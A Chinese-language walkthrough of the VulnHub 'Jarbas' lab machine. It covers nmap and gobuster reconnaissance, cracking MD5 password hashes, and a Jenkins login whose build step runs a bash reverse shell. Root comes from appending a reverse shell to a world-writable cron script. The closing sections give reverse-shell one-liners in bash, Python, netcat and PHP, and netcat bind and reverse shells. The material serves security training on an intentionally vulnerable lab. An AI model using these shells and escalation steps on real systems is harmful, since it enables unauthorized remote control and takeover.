靶机
DVWA
Upload-labs
Xss-labs
Pikachu
DC-1
DC-2
DC-3
DC-4
DC-5
DC-6
DC-7
DC-8
DC-9
w1r3s
JARBAS
SickOS1.1
Prime1
-
+
首页
JARBAS
靶机地址:https://download.vulnhub.com/jarbas/Jarbas.zip 下载完成后,进行解压,使用VMware打开且保持和kali机器在同一网络环境。 ## 信息搜集 1、IP地址确认。 ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ sudo nmap -sn 192.168.186.0/24 [sudo] password for kali: Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-03 04:33 EDT Nmap scan report for 192.168.186.1 (192.168.186.1) Host is up (0.00047s latency). MAC Address: 00:50:56:C0:00:08 (VMware) Nmap scan report for 192.168.186.2 (192.168.186.2) Host is up (0.00016s latency). MAC Address: 00:50:56:EC:88:83 (VMware) Nmap scan report for 192.168.186.132 (192.168.186.132) Host is up (0.00021s latency). MAC Address: 00:0C:29:1C:EF:7E (VMware) Nmap scan report for 192.168.186.254 (192.168.186.254) Host is up (0.00012s latency). MAC Address: 00:50:56:EF:45:80 (VMware) Nmap scan report for 192.168.186.128 (192.168.186.128) Host is up. Nmap done: 256 IP addresses (5 hosts up) scanned in 1.94 seconds ``` 确定靶机IP地址:192.168.186.132 2、针对IP地址进行端口扫描。 > 进行完整的TCP扫描 ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ sudo nmap -sT --min-rate 10000 -p- 192.168.186.132 Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-03 04:35 EDT Nmap scan report for 192.168.186.132 (192.168.186.132) Host is up (0.0016s latency). Not shown: 65531 closed tcp ports (conn-refused) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 3306/tcp open mysql 8080/tcp open http-proxy MAC Address: 00:0C:29:1C:EF:7E (VMware) Nmap done: 1 IP address (1 host up) scanned in 7.43 seconds ``` > UDP扫描 ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ sudo nmap -sU --min-rate 10000 -p- 192.168.186.132 [sudo] password for kali: Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-03 04:36 EDT Warning: 192.168.186.132 giving up on port because retransmission cap hit (10). Nmap scan report for 192.168.186.132 (192.168.186.132) Host is up (0.00064s latency). Not shown: 65456 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach) PORT STATE SERVICE 33848/udp open unknown MAC Address: 00:0C:29:1C:EF:7E (VMware) Nmap done: 1 IP address (1 host up) scanned in 72.93 seconds ``` 开放端口为22、80、3306、8080、33848 3、针对开放的端口进行版本服务探测、默认脚本扫描、操作系统探测。 > tcp扫描 ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ sudo nmap -sT -sV -sC -O -p22,80,3306,8080 192.168.186.132 Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-03 04:38 EDT Nmap scan report for 192.168.186.132 (192.168.186.132) Host is up (0.00031s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) | ssh-hostkey: | 2048 28:bc:49:3c:6c:43:29:57:3c:b8:85:9a:6d:3c:16:3f (RSA) | 256 a0:1b:90:2c:da:79:eb:8f:3b:14:de:bb:3f:d2:e7:3f (ECDSA) |_ 256 57:72:08:54:b7:56:ff:c3:e6:16:6f:97:cf:ae:7f:76 (ED25519) 80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16) |_http-title: Jarbas - O Seu Mordomo Virtual! |_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16 | http-methods: |_ Potentially risky methods: TRACE 3306/tcp open mysql MariaDB 10.3.23 or earlier (unauthorized) 8080/tcp open http Jetty 9.4.z-SNAPSHOT |_http-server-header: Jetty(9.4.z-SNAPSHOT) | http-robots.txt: 1 disallowed entry |_/ |_http-title: Site doesn't have a title (text/html;charset=utf-8). MAC Address: 00:0C:29:1C:EF:7E (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.14 Network Distance: 1 hop OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.93 seconds ``` 得知: - 22端口ssh登录; - 80端口:Apache/2.4.6 (CentOS) PHP/5.4.16; - 8080端口:同样是一个网站,且http-robots.txt文件不允许访问。 > UDP扫描 ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ sudo nmap -sU -sV -sC -O -p33848 192.168.186.132 Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-03 04:39 EDT Nmap scan report for 192.168.186.132 (192.168.186.132) Host is up (0.00032s latency). PORT STATE SERVICE VERSION 33848/udp open unknown | fingerprint-strings: | AFSVersionRequest, Citrix, DNS-SD, DNSStatusRequest, DNSVersionBindReq, Help, Kerberos, NBTStat, NTPRequest, NetMotionMobility, ONCRPC_CALL, RPCCheck, SIPOptions, SNMPv1public, SNMPv3GetRequest, Sqlping, sybaseanywhere, xdmcp: |_ <hudson><version>2.113</version><server-id>79704f1ca3914502789b0e0161b7d92c</server-id></hudson> 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port33848-UDP:V=7.95%I=7%D=10/3%Time=68DF8BC7%P=x86_64-pc-linux-gnu%r(O SF:NCRPC_CALL,60,"<hudson><version>2\.113</version><server-id>79704f1ca391 SF:4502789b0e0161b7d92c</server-id></hudson>")%r(RPCCheck,60,"<hudson><ver SF:sion>2\.113</version><server-id>79704f1ca3914502789b0e0161b7d92c</serve SF:r-id></hudson>")%r(DNSVersionBindReq,60,"<hudson><version>2\.113</versi SF:on><server-id>79704f1ca3914502789b0e0161b7d92c</server-id></hudson>")%r SF:(DNSStatusRequest,60,"<hudson><version>2\.113</version><server-id>79704 SF:f1ca3914502789b0e0161b7d92c</server-id></hudson>")%r(NBTStat,60,"<hudso SF:n><version>2\.113</version><server-id>79704f1ca3914502789b0e0161b7d92c< SF:/server-id></hudson>")%r(Help,60,"<hudson><version>2\.113</version><ser SF:ver-id>79704f1ca3914502789b0e0161b7d92c</server-id></hudson>")%r(SIPOpt SF:ions,60,"<hudson><version>2\.113</version><server-id>79704f1ca391450278 SF:9b0e0161b7d92c</server-id></hudson>")%r(Sqlping,60,"<hudson><version>2\ SF:.113</version><server-id>79704f1ca3914502789b0e0161b7d92c</server-id></ SF:hudson>")%r(NTPRequest,60,"<hudson><version>2\.113</version><server-id> SF:79704f1ca3914502789b0e0161b7d92c</server-id></hudson>")%r(SNMPv1public, SF:60,"<hudson><version>2\.113</version><server-id>79704f1ca3914502789b0e0 SF:161b7d92c</server-id></hudson>")%r(SNMPv3GetRequest,60,"<hudson><versio SF:n>2\.113</version><server-id>79704f1ca3914502789b0e0161b7d92c</server-i SF:d></hudson>")%r(xdmcp,60,"<hudson><version>2\.113</version><server-id>7 SF:9704f1ca3914502789b0e0161b7d92c</server-id></hudson>")%r(AFSVersionRequ SF:est,60,"<hudson><version>2\.113</version><server-id>79704f1ca3914502789 SF:b0e0161b7d92c</server-id></hudson>")%r(DNS-SD,60,"<hudson><version>2\.1 SF:13</version><server-id>79704f1ca3914502789b0e0161b7d92c</server-id></hu SF:dson>")%r(Citrix,60,"<hudson><version>2\.113</version><server-id>79704f SF:1ca3914502789b0e0161b7d92c</server-id></hudson>")%r(Kerberos,60,"<hudso SF:n><version>2\.113</version><server-id>79704f1ca3914502789b0e0161b7d92c< SF:/server-id></hudson>")%r(sybaseanywhere,60,"<hudson><version>2\.113</ve SF:rsion><server-id>79704f1ca3914502789b0e0161b7d92c</server-id></hudson>" SF:)%r(NetMotionMobility,60,"<hudson><version>2\.113</version><server-id>7 SF:9704f1ca3914502789b0e0161b7d92c</server-id></hudson>"); MAC Address: 00:0C:29:1C:EF:7E (VMware) Too many fingerprints match this host to give specific OS details Network Distance: 1 hop OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 104.40 seconds ``` 从指纹识别结果可以确定这是 **Hudson/Jenkins** 持续集成服务器: ```bash <hudson><version>2.113</version><server-id>79704f1ca3914502789b0e0161b7d92c</server-id></hudson> ``` - **软件**: Hudson/Jenkins - **版本**: 2.113 - **服务器ID**: 79704f1ca3914502789b0e0161b7d92c 4、漏洞扫描。 ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ sudo nmap --script=vuln -p22,80,3306,8080 192.168.186.132 Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-03 04:49 EDT Nmap scan report for 192.168.186.132 (192.168.186.132) Host is up (0.00028s latency). PORT STATE SERVICE 22/tcp open ssh 80/tcp open http | http-sql-injection: | Possible sqli for queries: | http://192.168.186.132:80/index_arquivos/?C=N%3BO%3DD%27%20OR%20sqlspider | http://192.168.186.132:80/index_arquivos/?C=M%3BO%3DA%27%20OR%20sqlspider | http://192.168.186.132:80/index_arquivos/?C=S%3BO%3DA%27%20OR%20sqlspider | http://192.168.186.132:80/index_arquivos/?C=D%3BO%3DA%27%20OR%20sqlspider | http://192.168.186.132:80/index_arquivos/?C=S%3BO%3DA%27%20OR%20sqlspider | http://192.168.186.132:80/index_arquivos/?C=M%3BO%3DA%27%20OR%20sqlspider | http://192.168.186.132:80/index_arquivos/?C=D%3BO%3DA%27%20OR%20sqlspider | http://192.168.186.132:80/index_arquivos/?C=N%3BO%3DA%27%20OR%20sqlspider | http://192.168.186.132:80/index_arquivos/?C=M%3BO%3DD%27%20OR%20sqlspider | http://192.168.186.132:80/index_arquivos/?C=S%3BO%3DA%27%20OR%20sqlspider | http://192.168.186.132:80/index_arquivos/?C=D%3BO%3DA%27%20OR%20sqlspider | http://192.168.186.132:80/index_arquivos/?C=N%3BO%3DA%27%20OR%20sqlspider | http://192.168.186.132:80/index_arquivos/?C=S%3BO%3DD%27%20OR%20sqlspider | http://192.168.186.132:80/index_arquivos/?C=N%3BO%3DA%27%20OR%20sqlspider | http://192.168.186.132:80/index_arquivos/?C=D%3BO%3DA%27%20OR%20sqlspider |_ http://192.168.186.132:80/index_arquivos/?C=M%3BO%3DA%27%20OR%20sqlspider |_http-trace: TRACE is enabled | http-csrf: | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.186.132 | Found the following possible CSRF vulnerabilities: | | Path: http://192.168.186.132:80/ | Form id: wmtb | Form action: /web/submit | | Path: http://192.168.186.132:80/ | Form id: | Form action: /web/20020720170457/http://jarbas.com.br:80/user.php | | Path: http://192.168.186.132:80/ | Form id: |_ Form action: /web/20020720170457/http://jarbas.com.br:80/busca/ |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. | http-enum: |_ /icons/: Potentially interesting folder w/ directory listing 3306/tcp open mysql 8080/tcp open http-proxy | http-enum: |_ /robots.txt: Robots file MAC Address: 00:0C:29:1C:EF:7E (VMware) Nmap done: 1 IP address (1 host up) scanned in 39.59 seconds ``` ## 80端口  > 目录扫描 所用字典为SecLists,是OWASP维护的一个安全信息列表集合,地址:https://github.com/danielmiessler/SecLists# 下载完成之后进行解压且重命名:`sudo unzip master.zip -d seclists` ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ sudo gobuster dir -u http://192.168.186.132/ -w /usr/share/wordlists/seclists/SecLists-master/Discovery/Web-Content/raft-large-directories.txt -x php,html [sudo] password for kali: =============================================================== Gobuster v3.8 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.186.132/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/seclists/SecLists-master/Discovery/Web-Content/raft-large-directories.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.8 [+] Extensions: php,html [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /index.html (Status: 200) [Size: 32808] /access.html (Status: 200) [Size: 359] /index.html (Status: 200) [Size: 32808] Progress: 186843 / 186843 (100.00%) =============================================================== Finished =============================================================== ```  ```txt tiago:5978a63b4654c73c60fa24f836386d87 trindade:f463f63616cb3f1e81ce46b39f882fd5 eder:9b38e2b1e8b12f426b0d208a7ab6cb98 ``` > 何种加密方式 ```bash ┌──(kali㉿kali)-[~] └─$ hash-identifier ######################################################################### # __ __ __ ______ _____ # # /\ \/\ \ /\ \ /\__ _\ /\ _ \ # # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # # \ \ _ \ /'__\ / ,__\ \ \ _ \ \ \ \ \ \ \ \ \ # # \ \ \ \ \/\ \_\ \_/\__, \ \ \ \ \ \ \_\ \__ \ \ \_\ \ # # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 # # By Zion3R # # www.Blackploit.com # # Root@Blackploit.com # ######################################################################### -------------------------------------------------- HASH: 5978a63b4654c73c60fa24f836386d87 Possible Hashs: [+] MD5 [+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username))) Least Possible Hashs: [+] RAdmin v2.x ``` > 破解MD5 https://www.somd5.com/ ```bash tiago:italia99 trindade:marianna eder:vipsu ``` ## 8080端口 是一个登录框且CMS是 Jenkins  > robots文件  > 使用账户进行登录,直到使用eder:vipsu进行登录成功  CMS为Jenkins,是一个 开源软件项目,是基于 Java开发的一种 持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台。 > 寻找漏洞点 1、直接点击创建新的jbos。 2、输入项目名称,选择第一个自由项目风格,点击OK。  3、然后在Build中发现可以直接构建shell。  4、构造反弹shell: ```bash /bin/bash -i >& /dev/tcp/192.168.186.128/4444 0>&1 ```  在kali机中进行监听4444端口。  项目构建完成之后点击【Build Now】   获取反弹shell成功。  ## crontab提权 ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nc -lvnp 4444 listening on [any] 4444 ... connect to [192.168.186.128] from (UNKNOWN) [192.168.186.132] 59282 bash: no job control in this shell bash-4.2$ whoami whoami jenkins bash-4.2$ id id uid=997(jenkins) gid=995(jenkins) groups=995(jenkins) context=system_u:system_r:initrc_t:s0 bash-4.2$ sudo -l sudo -l We trust you have received the usual lecture from the local System Administrator. It usually boils down to these three things: #1) Respect the privacy of others. #2) Think before you type. #3) With great power comes great responsibility. sudo: no tty present and no askpass program specified bash-4.2$ ``` 查看计划任务: ```bash bash-4.2$ cat /etc/crontab cat /etc/crontab SHELL=/bin/bash PATH=/sbin:/bin:/usr/sbin:/usr/bin MAILTO=root # For details see man 4 crontabs # Example of job definition: # .---------------- minute (0 - 59) # | .------------- hour (0 - 23) # | | .---------- day of month (1 - 31) # | | | .------- month (1 - 12) OR jan,feb,mar,apr ... # | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat # | | | | | # * * * * * user-name command to be executed */5 * * * * root /etc/script/CleaningScript.sh >/dev/null 2>&1 ``` 发现CleaningScript.sh脚本以root用户账户每五分钟进行执行。 查看是否有写入权限。 ```bash bash-4.2$ ls -l /etc/script/CleaningScript.sh ls -l /etc/script/CleaningScript.sh -rwxrwxrwx. 1 root root 50 Apr 1 2018 /etc/script/CleaningScript.sh ``` > 再次构造反弹shell ```bash echo "/bin/bash -i >& /dev/tcp/192.168.186.128/6666 0>&1" >> /etc/script/CleaningScript.sh ``` ```bash bash-4.2$ cat /etc/script/CleaningScript.sh cat /etc/script/CleaningScript.sh #!/bin/bash rm -rf /var/log/httpd/access_log.txt /bin/bash -i >& /dev/tcp/192.168.186.128/6666 0>&1 bash-4.2$ ``` 同时kali进行监听6666端口。 ```bash sudo nc -lnvp 6666 ``` > root权限获取成功 ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ sudo nc -lnvp 6666 [sudo] password for kali: listening on [any] 6666 ... connect to [192.168.186.128] from (UNKNOWN) [192.168.186.132] 44530 bash: no job control in this shell [root@jarbas ~]# whoami whoami root [root@jarbas ~]# id id uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:system_cronjob_t:s0-s0:c0.c1023 [root@jarbas ~]# cd /root cd /root [root@jarbas ~]# ls ls flag.txt [root@jarbas ~]# cat flag.txt cat flag.txt Hey! Congratulations! You got it! I always knew you could do it! This challenge was very easy, huh? =) Thanks for appreciating this machine. @tiagotvrs [root@jarbas ~]# ``` ## 反弹shell ### 概述 反弹 shell 是指**由目标主机主动发起连接,连接到控制端(攻击者 / 管理员)预先监听的端口**,并将目标主机的命令行输入输出流(stdin、stdout、stderr)重定向到该连接的技术。通过这种方式,控制端可以直接向目标主机发送命令,并接收执行结果,实现远程操控。 > 分类 **正向 shell**:控制端主动连接目标主机开放的端口(目标主机提前监听端口),适用于目标主机可被直接访问的场景(如公网主机)。 **反弹 shell**:目标主机主动连接控制端的监听端口,适用于目标主机处于内网、被防火墙限制入站连接,或控制端处于 NAT 后无法被直接访问的场景。 > 基本流程 1. **控制端监听端口**:在控制服务器上开启网络监听 2. **目标主机执行反弹代码**:在受害主机上执行反弹Shell命令 3. **建立连接与流重定向**:受害主机连接到攻击者监听端口 4. **会话交互**:通过建立的连接进行命令执行 ### 实现方式 反弹 shell 可通过多种编程语言或系统工具实现,核心是 “建立网络连接 + 重定向 IO 流”。 > Bash(适用于 Linux 系统) 利用 Bash 的/dev/tcp伪设备(部分系统支持)直接建立 TCP 连接并重定向流: ```bash /bin/bash -i >& /dev/tcp/控制端IP/控制端端口 0>&1 ``` 解析:bash -i启动交互式 shell;>&将 stdout 和 stderr 重定向到/dev/tcp建立的网络连接;0>&1将 stdin 重定向到 stdout(即网络连接)。 > Python(跨平台,需目标主机安装 Python) ```python import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("控制端IP", 控制端端口)) # 连接控制端 os.dup2(s.fileno(),0) # 重定向stdin到socket os.dup2(s.fileno(),1) # 重定向stdout到socket os.dup2(s.fileno(),2) # 重定向stderr到socket p=subprocess.call(["/bin/sh","-i"]) # 启动交互式shell ``` > Netcat(简称 nc,需目标主机安装 netcat) ```bash nc 控制端IP 控制端端口 -e /bin/sh # -e指定将shell绑定到连接 ``` 部分 netcat 版本禁用-e参数,可通过管道规避:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 控制端IP 控制端端口 >/tmp/f > PHP(适用于 Web 服务器,通过网页脚本触发) ```php <?php $sock=fsockopen("控制端IP", 控制端端口); // 建立连接 exec("/bin/sh -i <&3 >&3 2>&3"); // 重定向IO到socket(文件描述符3) ?> ``` ## netcat ### 概述 Netcat(简称nc)是一款功能强大的网络工具,被誉为 “网络瑞士军刀”,因其简洁灵活的设计和多场景适用性,成为网络调试、渗透测试、远程管理等领域的必备工具。它支持 TCP/UDP 协议,可实现端口扫描、连接建立、数据传输、shell 交互等多种功能,且跨平台(Linux、Windows、macOS 等均有版本)。 > 定义 Netcat 是一个基于命令行的网络工具,核心功能是在两台主机之间建立 TCP 或 UDP 连接,并在连接上传输数据(文本、文件、命令流等)。 它的设计理念是 “简单而通用”—— 通过最小化的接口实现最灵活的网络交互,可单独使用,也可与其他工具(如bash、python)组合实现复杂功能。 > 特性 **协议支持**:默认使用 TCP,通过-u参数支持 UDP。 **双向通信**:建立连接后,可双向传输数据(从标准输入读取,向标准输出写入)。 **无状态设计**:不解析应用层协议(如 HTTP、FTP),仅处理底层数据传输,灵活性极高。 **跨平台**:主流操作系统均有移植版本(如 GNU Netcat、OpenBSD Netcat、ncat 等衍生版本)。 > 命令格式 ```bash nc [选项] [目标IP] [目标端口] ``` > 最常用的参数 | 参数 | 作用 | | ---- | ------------------------------------------------------------ | | -l | 进入监听模式(被动等待连接),需配合-p指定端口。 | | -p | 指定本地端口(监听或连接时使用)。 | | -v | 显示详细输出(verbose 模式),用于调试(如连接成功 / 失败信息)。 | | -vv | 更详细的输出(debug 级),显示更多底层信息(如 TCP 握手过程)。 | | -n | 不进行 DNS 解析(直接使用 IP,加速连接)。 | | -u | 使用 UDP 协议(默认是 TCP)。 | | -e | 绑定一个程序到连接(如-e /bin/sh将 shell 绑定到连接,风险极高)。 | | -w | 超时时间(秒),用于连接或监听时限制等待时间。 | | -z | 扫描模式(仅检测端口是否开放,不发送数据)。 | ### 核心功能 > 端口扫描(检测目标端口是否开放) 通过-z(扫描模式)和-v(详细输出),可快速检测目标主机的端口状态(TCP 默认,-u可扫描 UDP)。 ```bash nc -zv 192.168.1.100 80-85 ``` > 建立 TCP/UDP 连接(简易聊天 / 数据传输) 主机 A(监听): ```bash nc -lvp 8888 # -l监听,-v详细,-p指定端口8888 ``` 主机 B(连接): ```bash nc -nv 192.168.1.101 8888 # -n不解析DNS,-v详细 ``` 连接建立后,两边输入的文本会实时发送给对方,按Ctrl+C断开连接。 > 文件传输(无依赖快速传文件) 当目标主机没有scp、ftp等工具时,Netcat 可通过重定向实现文件传输(需确保端口可通)。 主机 B(接收方,先监听): ```bash nc -lvp 8888 > test.txt # 将接收到的数据写入test.txt ``` 主机 A(发送方,连接并发送): ```bash nc -nv 192.168.1.102 8888 < test.txt # 读取test.txt并发送 ``` 传输完成后,两边按Ctrl+C结束即可。同理可传输压缩包、二进制文件等。 > 正向连接shell 目标主机监听端口,并将 shell 绑定到该端口,控制端主动连接目标端口获取 shell。 目标主机(Linux): ```bash nc -lvp 8888 -e /bin/sh # 监听8888端口,将/bin/sh绑定到连接 ``` 控制端: ```bash nc -nv 目标IP 8888 # 连接目标端口,获取shell ``` 连接后,控制端输入的命令会在目标主机执行,结果返回控制端。 > 反向连接shell 目标主机主动连接控制端的监听端口,并将 shell 发送给控制端(适用于目标在内网或防火墙限制入站连接的场景)。 控制端(先监听): ```bash nc -lvp 8888 # 监听8888端口,等待连接 ``` 目标主机(Linux): ```bash nc -nv 控制端IP 8888 -e /bin/sh # 主动连接控制端,将shell发送过去 ``` 连接建立后,控制端即可远程操控目标主机。 > 端口转发(流量中转) Netcat 可将本地端口的流量转发到目标主机的指定端口,实现简易的 “端口映射”。 **场景**:将本地 8080 端口的流量转发到10.0.0.1:80(访问本地 8080 即相当于访问 10.0.0.1:80)。 ```bash nc -lvp 8080 -c 'nc 10.0.0.1 80' # -c执行命令,将流量转发到10.0.0.1:80 ``` > 作为简易 Web 服务器 结合echo和管道,可快速搭建一个返回固定内容的 Web 服务器(仅用于测试)。 **示例**:监听 80 端口,向访问者返回 “Hello Netcat”: ```bash while true; do echo -e "HTTP/1.1 200 OK\n\nHello Netcat" | nc -lvp 80; done ``` 注意:while true确保连接断开后重新监听,echo -e构造 HTTP 响应头。
毛林
2025年10月3日 18:29
转发文档
收藏文档
上一篇
下一篇
手机扫码
复制链接
手机扫一扫转发分享
复制链接
Markdown文件
PDF文档(打印)
分享
链接
类型
密码
更新密码